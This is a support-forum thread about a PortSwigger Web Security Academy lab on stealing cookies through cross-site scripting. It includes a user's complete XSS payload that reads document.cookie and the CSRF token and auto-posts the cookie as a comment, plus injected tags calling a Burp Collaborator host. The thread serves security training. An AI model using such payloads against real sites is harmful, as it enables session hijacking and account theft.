Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

lab question

5ch00l Nov 05, 2019 01:44PM UTC

how am i supposed to steal cookies from this lab
"Lab: Exploiting cross-site scripting to steal cookies" without having burp professional and without using Burp Collaborator client
I've tried redirecting users to my site and making everyone that visits the blog post a comment
but none of there two seems to work


5ch00l Nov 05, 2019 02:50PM UTC
<form id="my_form" action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">

<input required type="hidden" name="postId" value="4">
<input type="hidden" id="coke" value="" name="comment">
<input required type="hidden" value="majname" name="name">
<input required type="hidden" value="majmail@gmail.com" name="email">
</form>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script>



$(window).on('load', function(){
var a_csrf = document.getElementsByName('csrf')[0].value
document.getElementById('coke').value = document.cookie;
var inp = document.createElement('input');
inp.type="hidden";
inp.name="csrf";
inp.value=a_csrf;
document.getElementById('my_form').appendChild(inp);
document.getElementById('my_form').submit();
});
</script>


this is my payload for commenting
it works on myself but no bot seems to visit the blog tho

Liam Tai-Hogan Nov 05, 2019 04:09PM UTC Support Center agent

Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.


5ch00l Nov 05, 2019 07:11PM UTC
please read what i have written and not reply with a copy paste or is this an automated bot ?

Mike Eaton Nov 06, 2019 11:41AM UTC Support Center agent

Hi, the previous comment is valid and not written by a bot. If you were able to perform that action you would force the emulated admin user to submit their cookie as a comment, which you could then retrieve from the blog post and submit in your request to solve the lab.

I have just checked the lab and It is working as intended as I have been able to solve it. There is a lab which allows you to practice exploiting XSS to perform CSRF at the following link which you could use to help you: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf


t Nov 08, 2019 08:22PM UTC
Hello. I had exactly the same issue and at really looks unsolvable. Could there by anything else wrong? Like different lab instances? My PoC works inside my browser, but otherwise no bot makes any request, I tried this for every postId several times.

I have even tried to inject very simple HTML tags, like these below, but only HTTP connection I ever received was mine:

<img src="https://MYDOMAIN.burpcollaborator.net"></img>
<script src="https://MYDOMAIN.burpcollaborator.net/?aa"></script>

Is there any other test you suggest I could perform to validate that the bot is visiting my post? Because clearly, it looks that he is not.

t Nov 10, 2019 07:39AM UTC
Doing it a little differently than the explained solution, I can confirm that the lab is still solvable.

Liam Tai-Hogan Nov 11, 2019 08:47AM UTC Support Center agent

Thanks for this report t. I’ve passed on your message to our Web Academy team.


t Nov 12, 2019 06:46AM UTC
Thanks, I noticed another weird thing, when I was doing https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration .. Again, the same situation, there was a DNS query to Burp Collaborator, but no HTTP request. Then I changed the URL to "exploit server" (so instead of collaborator, I verified the access logs and the HTTP request was really made) as someone suggested here: https://support.portswigger.net/customer/portal/questions/17576275-web-security-academy-blind-xxe-lab-3-exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-

I also saw this video I googled https://www.youtube.com/watch?v=glA5FwCdspk about the solution and I did everything exactly the same way, but as mentioned, have not received the request.

To summarise, it looks like the issue is that the HTTP request is not made to my collaborator, even when my collaborator is working correctly, as I validated via curl - it shows every HTTP request, but not from this lab. There is no possibility I made any typo as I verified everything several times.

Liam Tai-Hogan Nov 12, 2019 01:05PM UTC Support Center agent

Thanks for following up. We’re currently investigating this issue.


Liam Tai-Hogan Nov 12, 2019 03:04PM UTC Support Center agent

This issue should know be resolved.

Please let us know if you need any further assistance.


Post Your public answer

Your name
Your email address
Answer